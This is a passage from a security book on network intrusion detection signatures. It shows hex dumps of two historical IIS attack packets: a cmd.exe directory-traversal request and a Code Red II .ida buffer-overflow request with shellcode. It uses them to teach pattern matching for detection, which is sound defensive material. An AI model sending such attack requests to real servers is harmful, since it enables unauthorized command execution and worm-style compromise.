NIDS Signature Examples

     

An NIDS operates by examining packets and comparing them to known signatures. A good example of a common attack that can be clearly identified by its signature is the cmd.exe attack that is used against the Internet Information Server (IIS), which is Microsoft's Web server. This attack is used by Internet worms and viruses such as Nimda and Code Red. In this case, the worm or human attacker attempts to execute a copy of cmd.exe, which is the Windows command line binary, in a writable directory using a buffer overflow in the IIS Web server module called Internet Server API (ISAPI). If successful, then the hacker or worm has access to a command line on that machine and can wreak considerable havoc. However, the command to copy this file is obvious; there is no reason for legitimate users to be executing this file over the network via IIS. So if you see this activity, then it's a good bet that it is an intrusion attempt. By examining the packet payload and searching for the words cmd.exe, an NIDS can identify this kind of attack. Listing 7.1 shows one of these packets. The hexadecimal contents are on the left and the ASCII translation is on the right.

Listing 7.1. The cmd.exe Execution Packet
 length = 55 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /   scripts/..% 010 : 35 63 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  5c%5c../   winnt/sy 020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/   cmd.exe?/ 030 : 63 2B 64 69 72 0D 0A               c+dir.. 

Another attack that is easy to identify by its signature is the .ida buffer overflow. The Code Red worm propagated using this method. It utilized a buffer overflow in the .ida extension for Microsoft's IIS Web server. This extension is installed by default but is often not needed. If you don't install the patch for this condition, it can allow direct access to your machine. Fortunately, an NIDS can quickly identify these packets by matching the GET /default.ida statement contained in them. You can see a partial listing of an .ida attack in Listing 7.2. This particular one also has the words Code Red II in it, which means it was generated by a Code Red worm trying to infect this machine. Even if your machines are fully patched and immune to these kinds of attacks, it is good to know where they are coming from and at what frequency.

Listing 7.2. Signature of an .ida Attack
 length = 1414 000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /   default.ida 010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   ?XXXXXXXXXXXXXXX 020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX 0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   X%u9090%u6858%uc 100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090% 110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780 120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc 130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090% 140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c 150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5 160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078% 170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a HTT 180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/   1.0..Content-t 190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/   xml.Co 1a0 : 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33   ntent-length: 33 1b0 : 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79   ........'.... 1c0 : 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00   ....dg.6..dg.&.. 1d0 : E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF   .....h......\... 1e0 : 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40   P.U...\...P.U..@ 1f0 : 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00   .....X....U.=... 200 : 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6   ....=........... 210 : C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00   ...T....u..~0... 220 : 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A   ........F0...... 230 : 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24   ...CodeRedII...$ 



Open Source Security Tools. Securing Your Unix or Windows Systems
Open Source Security Tools. Securing Your Unix or Windows Systems
ISBN: N/A
EAN: N/A
Year: 2003
Pages: 99

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net